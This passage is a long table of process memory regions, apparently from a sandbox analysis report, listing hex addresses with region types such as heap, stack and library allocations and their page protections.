page read and write
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1F0B386A000
|
heap
|
page read and write
|
||
|
1F0B3855000
|
heap
|
page read and write
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
1AD01190000
|
heap
|
page readonly
|
||
|
AB4587E000
|
unkown
|
page readonly
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37D6000
|
heap
|
page read and write
|
||
|
20ACEF91000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
20AB3028000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFC3000
|
heap
|
page read and write
|
||
|
20AB6D85000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37B0000
|
trusted library allocation
|
page read and write
|
||
|
190000
|
heap
|
page read and write
|
||
|
20ACEFF1000
|
heap
|
page read and write
|
||
|
14C000
|
stack
|
page read and write
|
||
|
AB45C7E000
|
unkown
|
page readonly
|
||
|
7FFB1E872000
|
unkown
|
page readonly
|
||
|
89F000
|
stack
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
20AB65F0000
|
trusted library allocation
|
page read and write
|
||
|
1AD040F2000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC180000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3890000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37E4000
|
heap
|
page read and write
|
||
|
20AB2FEE000
|
heap
|
page read and write
|
||
|
20AB67D0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
14217000
|
trusted library allocation
|
page read and write
|
||
|
20ACF002000
|
heap
|
page read and write
|
||
|
AB45AFE000
|
stack
|
page read and write
|
||
|
20AB6850000
|
trusted library allocation
|
page read and write
|
||
|
16019000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37CE000
|
heap
|
page read and write
|
||
|
20AB6720000
|
trusted library allocation
|
page read and write
|
||
|
7218807000
|
stack
|
page read and write
|
||
|
1AD01020000
|
heap
|
page read and write
|
||
|
1F0B3820000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3860000
|
trusted library allocation
|
page read and write
|
||
|
20AB2ED0000
|
heap
|
page read and write
|
||
|
1F0B37E6000
|
heap
|
page read and write
|
||
|
175C0530000
|
heap
|
page read and write
|
||
|
721787D000
|
stack
|
page read and write
|
||
|
1F0CC170000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
23D9000
|
heap
|
page read and write
|
||
|
20ACEFF1000
|
heap
|
page read and write
|
||
|
7217ABE000
|
stack
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
2310000
|
heap
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page execute and read and write
|
||
|
20ACEFFE000
|
heap
|
page read and write
|
||
|
20ACEF93000
|
heap
|
page read and write
|
||
|
403000
|
unkown
|
page readonly
|
||
|
1C0000
|
heap
|
page read and write
|
||
|
1AD01180000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFDC000
|
heap
|
page read and write
|
||
|
1DCCE03A000
|
heap
|
page read and write
|
||
|
3073000
|
heap
|
page read and write
|
||
|
23CD000
|
heap
|
page read and write
|
||
|
20ACF028000
|
heap
|
page read and write
|
||
|
1F0B37E9000
|
heap
|
page read and write
|
||
|
1FD0000
|
heap
|
page read and write
|
||
|
721890C000
|
stack
|
page read and write
|
||
|
1AD03F34000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC180000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3830000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37E9000
|
heap
|
page read and write
|
||
|
985000
|
heap
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
205D484C000
|
heap
|
page read and write
|
||
|
20AB2F71000
|
unkown
|
page read and write
|
||
|
20AB65C0000
|
trusted library allocation
|
page read and write
|
||
|
1AD029A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3720000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
7DF4B36D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20AB65F3000
|
trusted library allocation
|
page read and write
|
||
|
1AD01052000
|
heap
|
page read and write
|
||
|
721898E000
|
stack
|
page read and write
|
||
|
239A000
|
heap
|
page read and write
|
||
|
1F0B37E2000
|
heap
|
page read and write
|
||
|
1F0CC152000
|
trusted library allocation
|
page read and write
|
||
|
403000
|
unkown
|
page readonly
|
||
|
1AD0107F000
|
heap
|
page read and write
|
||
|
1F0CC15C000
|
trusted library allocation
|
page read and write
|
||
|
20AB3022000
|
heap
|
page read and write
|
||
|
1C4821EA000
|
heap
|
page read and write
|
||
|
20AB67B0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3871000
|
heap
|
page read and write
|
||
|
20AB6880000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFC7000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB6740000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFC2000
|
heap
|
page read and write
|
||
|
1F0AFE10000
|
heap
|
page read and write
|
||
|
AB45CFE000
|
stack
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
20AB301F000
|
heap
|
page read and write
|
||
|
175C06C4000
|
heap
|
page read and write
|
||
|
20AB3023000
|
heap
|
page read and write
|
||
|
1F0B3720000
|
trusted library allocation
|
page read and write
|
||
|
20AB301F000
|
heap
|
page read and write
|
||
|
175C06DB000
|
heap
|
page read and write
|
||
|
20ACEF82000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
175C0630000
|
heap
|
page read and write
|
||
|
1F0B3785000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E851000
|
unkown
|
page execute read
|
||
|
205D4863000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37C7000
|
heap
|
page read and write
|
||
|
1F0B37A1000
|
heap
|
page read and write
|
||
|
1F0B3865000
|
heap
|
page read and write
|
||
|
20ACEFA5000
|
heap
|
page read and write
|
||
|
1AD03F30000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
1AD0109F000
|
heap
|
page read and write
|
||
|
20ACEFA9000
|
heap
|
page read and write
|
||
|
7FFAAC4E6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
20AB2FFF000
|
heap
|
page read and write
|
||
|
20AB67E0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1DCCDF70000
|
heap
|
page read and write
|
||
|
205D485D000
|
heap
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFB7000
|
heap
|
page read and write
|
||
|
1F0CC190000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
20AB6791000
|
trusted library allocation
|
page read and write
|
||
|
20AB2FD7000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC3E6000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37E6000
|
heap
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC334000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3780000
|
trusted library allocation
|
page read and write
|
||
|
CDA1FFF000
|
stack
|
page read and write
|
||
|
1AD03F41000
|
trusted library allocation
|
page read and write
|
||
|
1C4822E0000
|
heap
|
page read and write
|
||
|
20AB6755000
|
heap
|
page read and write
|
||
|
20AB6800000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1AD02B40000
|
heap
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
175C07A0000
|
heap
|
page read and write
|
||
|
1CC31910000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFCA000
|
heap
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20AB3020000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC218000
|
heap
|
page read and write
|
||
|
1F0B37A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3765000
|
trusted library allocation
|
page read and write
|
||
|
7217A39000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
20ACEFFB000
|
heap
|
page read and write
|
||
|
14C000
|
stack
|
page read and write
|
||
|
20AB67C0000
|
trusted library allocation
|
page read and write
|
||
|
20ACF081000
|
heap
|
page read and write
|
||
|
1F0CC170000
|
trusted library allocation
|
page read and write
|
||
|
1AD03057000
|
trusted library allocation
|
page read and write
|
||
|
1AD01040000
|
heap
|
page read and write
|
||
|
A6108FC000
|
stack
|
page read and write
|
||
|
20ACEFD6000
|
heap
|
page read and write
|
||
|
1F0B37E9000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFC2000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
2350000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37B6000
|
heap
|
page read and write
|
||
|
1F0B37B9000
|
heap
|
page read and write
|
||
|
14C19000
|
trusted library allocation
|
page read and write
|
||
|
20ACEF81000
|
heap
|
page read and write
|
||
|
1AD02FB0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20AB2F9F000
|
unkown
|
page read and write
|
||
|
403000
|
unkown
|
page readonly
|
||
|
20ACEF93000
|
heap
|
page read and write
|
||
|
1F0CC1B0000
|
trusted library allocation
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
20ACF02A000
|
heap
|
page read and write
|
||
|
353ABFF000
|
stack
|
page read and write
|
||
|
1F0B37F0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3780000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3780000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
205D4F50000
|
remote allocation
|
page read and write
|
||
|
20ACEF8B000
|
heap
|
page read and write
|
||
|
20ACEF88000
|
heap
|
page read and write
|
||
|
1AD00FE0000
|
heap
|
page read and write
|
||
|
1C4821F7000
|
heap
|
page read and write
|
||
|
1AD00FC0000
|
heap
|
page read and write
|
||
|
1AD03F49000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC190000
|
trusted library allocation
|
page read and write
|
||
|
21C4000
|
unkown
|
page readonly
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
721767E000
|
stack
|
page read and write
|
||
|
20AB6740000
|
trusted library allocation
|
page read and write
|
||
|
15619000
|
trusted library allocation
|
page read and write
|
||
|
20AB67B0000
|
trusted library allocation
|
page read and write
|
||
|
721793F000
|
stack
|
page read and write
|
||
|
1F84000
|
stack
|
page read and write
|
||
|
1F0CC266000
|
heap
|
page read and write
|
||
|
1F0B37E5000
|
heap
|
page read and write
|
||
|
721898C000
|
stack
|
page read and write
|
||
|
20ACEFEC000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFE7000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4F0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3810000
|
heap
|
page read and write
|
||
|
20AB6838000
|
trusted library allocation
|
page read and write
|
||
|
20AB0FC0000
|
unkown
|
page execute and read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
1F0B37D6000
|
heap
|
page read and write
|
||
|
20ACEF87000
|
heap
|
page read and write
|
||
|
20ACEFDA000
|
heap
|
page read and write
|
||
|
20AB2D80000
|
unkown
|
page readonly
|
||
|
3AFF000
|
heap
|
page read and write
|
||
|
1F0B37A7000
|
heap
|
page read and write
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
1AD03A22000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC345000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
21C4000
|
unkown
|
page readonly
|
||
|
20ACEFCC000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC184000
|
trusted library allocation
|
page read and write
|
||
|
190000
|
heap
|
page read and write
|
||
|
239F000
|
stack
|
page read and write
|
||
|
72172C3000
|
stack
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
AB45BFE000
|
stack
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
7217B3F000
|
stack
|
page read and write
|
||
|
23C0000
|
heap
|
page read and write
|
||
|
21C2000
|
unkown
|
page read and write
|
||
|
1F0B37A0000
|
trusted library allocation
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
20ACEF8C000
|
heap
|
page read and write
|
||
|
20AB67D0000
|
trusted library allocation
|
page read and write
|
||
|
2305000
|
heap
|
page read and write
|
||
|
1CC318F3000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4D2000
|
trusted library allocation
|
page read and write
|
||
|
1F0C55FE000
|
trusted library allocation
|
page read and write
|
||
|
205D4863000
|
heap
|
page read and write
|
||
|
1F0B3851000
|
heap
|
page read and write
|
||
|
20ACEFBD000
|
heap
|
page read and write
|
||
|
25E0000
|
heap
|
page read and write
|
||
|
1F0B37ED000
|
heap
|
page read and write
|
||
|
20ACF28F000
|
heap
|
page read and write
|
||
|
404E000
|
stack
|
page read and write
|
||
|
1F0B37C1000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
20ACEFD3000
|
heap
|
page read and write
|
||
|
20AB2F60000
|
unkown
|
page read and write
|
||
|
1F0B37D0000
|
trusted library allocation
|
page read and write
|
||
|
175C06A0000
|
heap
|
page read and write
|
||
|
1F0B3780000
|
trusted library allocation
|
page read and write
|
||
|
20AB67C0000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFF1000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
20AB6840000
|
trusted library allocation
|
page read and write
|
||
|
2443000
|
heap
|
page read and write
|
||
|
1F0B3806000
|
heap
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFC2000
|
heap
|
page read and write
|
||
|
1CC31900000
|
trusted library allocation
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B380F000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC216000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
21C4000
|
unkown
|
page readonly
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
26A5000
|
heap
|
page read and write
|
||
|
20AB65A0000
|
trusted library allocation
|
page read and write
|
||
|
23B1000
|
heap
|
page read and write
|
||
|
7FFAAC332000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFC0000
|
heap
|
page read and write
|
||
|
1F0AFE58000
|
heap
|
page read and write
|
||
|
1F0CC170000
|
trusted library allocation
|
page read and write
|
||
|
1DCCE325000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1DCCE320000
|
heap
|
page read and write
|
||
|
20AB2FCA000
|
unkown
|
page read and write
|
||
|
1F0CC17B000
|
trusted library allocation
|
page read and write
|
||
|
403000
|
unkown
|
page readonly
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
7217D3B000
|
stack
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37F5000
|
heap
|
page read and write
|
||
|
1CC2FF21000
|
heap
|
page read and write
|
||
|
40C000
|
unkown
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
205D484C000
|
heap
|
page read and write
|
||
|
1F0B37C9000
|
heap
|
page read and write
|
||
|
1F0B3761000
|
trusted library allocation
|
page read and write
|
||
|
1DCCE030000
|
heap
|
page read and write
|
||
|
20AB6795000
|
trusted library allocation
|
page read and write
|
||
|
20AB3030000
|
direct allocation
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20AB67B0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3800000
|
trusted library allocation
|
page read and write
|
||
|
20AC68CE000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3710000
|
trusted library allocation
|
page read and write
|
||
|
20AB6750000
|
heap
|
page read and write
|
||
|
40A0000
|
heap
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
AB4547E000
|
unkown
|
page readonly
|
||
|
1F0B3810000
|
heap
|
page read and write
|
||
|
7FFAAC33D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
14219000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20AB302D000
|
heap
|
page read and write
|
||
|
20AB2F30000
|
unkown
|
page read and write
|
||
|
1F0B37AC000
|
heap
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F0B38A0000
|
trusted library allocation
|
page read and write
|
||
|
1AD010C6000
|
heap
|
page read and write
|
||
|
1F0B3780000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20AB3023000
|
heap
|
page read and write
|
||
|
16A19000
|
trusted library allocation
|
page read and write
|
||
|
20AB6600000
|
heap
|
page read and write
|
||
|
1F0CC216000
|
heap
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
20AB67B5000
|
trusted library allocation
|
page read and write
|
||
|
353A77C000
|
stack
|
page read and write
|
||
|
20ACEFE4000
|
heap
|
page read and write
|
||
|
7FFAAC4E4000
|
trusted library allocation
|
page execute and read and write
|
||
|
CDA1B7C000
|
stack
|
page read and write
|
||
|
20AD1750000
|
trusted library section
|
page read and write
|
||
|
1F0B37B1000
|
heap
|
page read and write
|
||
|
20ACF080000
|
heap
|
page read and write
|
||
|
20ACEFF4000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
1F0AFE5D000
|
heap
|
page read and write
|
||
|
1F0B3710000
|
trusted library allocation
|
page read and write
|
||
|
175C08F0000
|
heap
|
page read and write
|
||
|
1C482160000
|
heap
|
page read and write
|
||
|
AB455FE000
|
unkown
|
page read and write
|
||
|
1AD01089000
|
heap
|
page read and write
|
||
|
7FFAAC4E0000
|
trusted library allocation
|
page read and write
|
||
|
7DF4B36C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20AB19C0000
|
unkown
|
page execute and read and write
|
||
|
403000
|
unkown
|
page readonly
|
||
|
20ACEFDC000
|
heap
|
page read and write
|
||
|
1F0B3780000
|
trusted library allocation
|
page read and write
|
||
|
3A73000
|
heap
|
page read and write
|
||
|
1F0B37A0000
|
trusted library allocation
|
page read and write
|
||
|
239F000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AC7311000
|
trusted library allocation
|
page read and write
|
||
|
1AD04393000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1AD011A0000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
7FFB1E866000
|
unkown
|
page readonly
|
||
|
AB4597E000
|
unkown
|
page readonly
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
7217C3D000
|
stack
|
page read and write
|
||
|
AB458FE000
|
stack
|
page read and write
|
||
|
AB457FD000
|
stack
|
page read and write
|
||
|
20ACEF86000
|
heap
|
page read and write
|
||
|
2336000
|
heap
|
page read and write
|
||
|
256F000
|
stack
|
page read and write
|
||
|
1F0B37A8000
|
heap
|
page read and write
|
||
|
721777E000
|
stack
|
page read and write
|
||
|
20ACEFF1000
|
heap
|
page read and write
|
||
|
20AB6730000
|
trusted library allocation
|
page read and write
|
||
|
20AB6870000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37C8000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
20AB67C0000
|
trusted library allocation
|
page read and write
|
||
|
7217AB8000
|
stack
|
page read and write
|
||
|
1F0B3810000
|
trusted library allocation
|
page read and write
|
||
|
1DCCE130000
|
heap
|
page read and write
|
||
|
20AB6730000
|
trusted library allocation
|
page read and write
|
||
|
20AB6797000
|
trusted library allocation
|
page read and write
|
||
|
1AD01160000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E875000
|
unkown
|
page readonly
|
||
|
20AB6917000
|
trusted library allocation
|
page read and write
|
||
|
20AC68D0000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFCF000
|
heap
|
page read and write
|
||
|
20AB67D0000
|
trusted library allocation
|
page read and write
|
||
|
23AF000
|
heap
|
page read and write
|
||
|
20AB68A6000
|
trusted library allocation
|
page read and write
|
||
|
1C482080000
|
heap
|
page read and write
|
||
|
1F0B385A000
|
heap
|
page read and write
|
||
|
20ACEFAC000
|
heap
|
page read and write
|
||
|
7FFAAC3F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAAC416000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F0B37D4000
|
heap
|
page read and write
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC190000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC1A0000
|
trusted library allocation
|
page read and write
|
||
|
1CC2FF13000
|
heap
|
page read and write
|
||
|
1803000
|
unkown
|
page readonly
|
||
|
1AD031F8000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3770000
|
trusted library allocation
|
page read and write
|
||
|
20ACEF80000
|
heap
|
page read and write
|
||
|
1F0B0080000
|
trusted library allocation
|
page read and write
|
||
|
25BF000
|
stack
|
page read and write
|
||
|
20ACEFA1000
|
heap
|
page read and write
|
||
|
AB45B7E000
|
unkown
|
page readonly
|
||
|
1AD042D9000
|
trusted library allocation
|
page read and write
|
||
|
20AC68C9000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
175C06AA000
|
heap
|
page read and write
|
||
|
20AB302E000
|
heap
|
page read and write
|
||
|
1F0CC180000
|
trusted library allocation
|
page read and write
|
||
|
20ACEF89000
|
heap
|
page read and write
|
||
|
20AB683F000
|
trusted library allocation
|
page read and write
|
||
|
20AB67B0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37F5000
|
heap
|
page read and write
|
||
|
1DCCDE90000
|
heap
|
page read and write
|
||
|
10000
|
unkown
|
page readonly
|
||
|
20AC6911000
|
trusted library allocation
|
page read and write
|
||
|
20AB68C1000
|
trusted library allocation
|
page read and write
|
||
|
1DCCE056000
|
heap
|
page read and write
|
||
|
20AB2E90000
|
unkown
|
page read and write
|
||
|
7DF4B36B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2660000
|
heap
|
page read and write
|
||
|
A610AFF000
|
stack
|
page read and write
|
||
|
20ACEFAF000
|
heap
|
page read and write
|
||
|
26A0000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
A12000
|
unkown
|
page readonly
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1AD0349D000
|
trusted library allocation
|
page read and write
|
||
|
20AB301F000
|
heap
|
page read and write
|
||
|
252F000
|
stack
|
page read and write
|
||
|
20ACEFB9000
|
heap
|
page read and write
|
||
|
1F0CC180000
|
trusted library allocation
|
page read and write
|
||
|
1CC31900000
|
trusted library allocation
|
page read and write
|
||
|
72178F9000
|
stack
|
page read and write
|
||
|
20ACEFF1000
|
heap
|
page read and write
|
||
|
20AB6791000
|
trusted library allocation
|
page read and write
|
||
|
175C06D9000
|
heap
|
page read and write
|
||
|
72176F9000
|
stack
|
page read and write
|
||
|
17419000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFAF000
|
heap
|
page read and write
|
||
|
20AC7D11000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFDF000
|
heap
|
page read and write
|
||
|
1AD03F3C000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB67C0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3867000
|
heap
|
page read and write
|
||
|
7FFB1E850000
|
unkown
|
page readonly
|
||
|
20AB2F5E000
|
unkown
|
page read and write
|
||
|
20ACEFA9000
|
heap
|
page read and write
|
||
|
4DD000
|
heap
|
page read and write
|
||
|
1F0B37B0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3872000
|
heap
|
page read and write
|
||
|
12000
|
unkown
|
page readonly
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
23E2000
|
heap
|
page read and write
|
||
|
1CC318F0000
|
trusted library allocation
|
page read and write
|
||
|
72173CE000
|
stack
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC180000
|
trusted library allocation
|
page read and write
|
||
|
1F0CC160000
|
trusted library allocation
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB2F00000
|
heap
|
page read and write
|
||
|
26FF000
|
heap
|
page read and write
|
||
|
7217CBF000
|
stack
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
205D4F50000
|
remote allocation
|
page read and write
|
||
|
20AB68B0000
|
heap
|
page execute and read and write
|
||
|
20ACEF98000
|
heap
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
20AB67C0000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFE7000
|
heap
|
page read and write
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
E03000
|
unkown
|
page readonly
|
||
|
1DCCE058000
|
heap
|
page read and write
|
||
|
1CC318F0000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
1AD02FC0000
|
heap
|
page execute and read and write
|
||
|
20ACEF90000
|
trusted library allocation
|
page read and write
|
||
|
20AB2F73000
|
unkown
|
page read and write
|
||
|
1F0B3863000
|
heap
|
page read and write
|
||
|
20AB67A0000
|
trusted library allocation
|
page read and write
|
||
|
20AD2150000
|
trusted library section
|
page read and write
|
||
|
1F0CC150000
|
trusted library allocation
|
page read and write
|
||
|
1F0B37E0000
|
heap
|
page read and write
|
||
|
1F0B3765000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3880000
|
trusted library allocation
|
page read and write
|
||
|
1AD010CB000
|
heap
|
page read and write
|
||
|
1AD0408E000
|
trusted library allocation
|
page read and write
|
||
|
1F0B3760000
|
trusted library allocation
|
page read and write
|
||
|
27AF000
|
stack
|
page read and write
|
||
|
403000
|
unkown
|
page readonly
|
||
|
20AB6790000
|
trusted library allocation
|
page read and write
|
||
|
20AB302A000
|
heap
|
page read and write
|
||
|
20AB6890000
|
trusted library allocation
|
page read and write
|
||
|
20ACEFD3000
|
heap
|
page read and write
|
||
|
1F0B3808000
|
trusted library allocation
|
page read and write
|
||
|
AB456FE000
|
stack
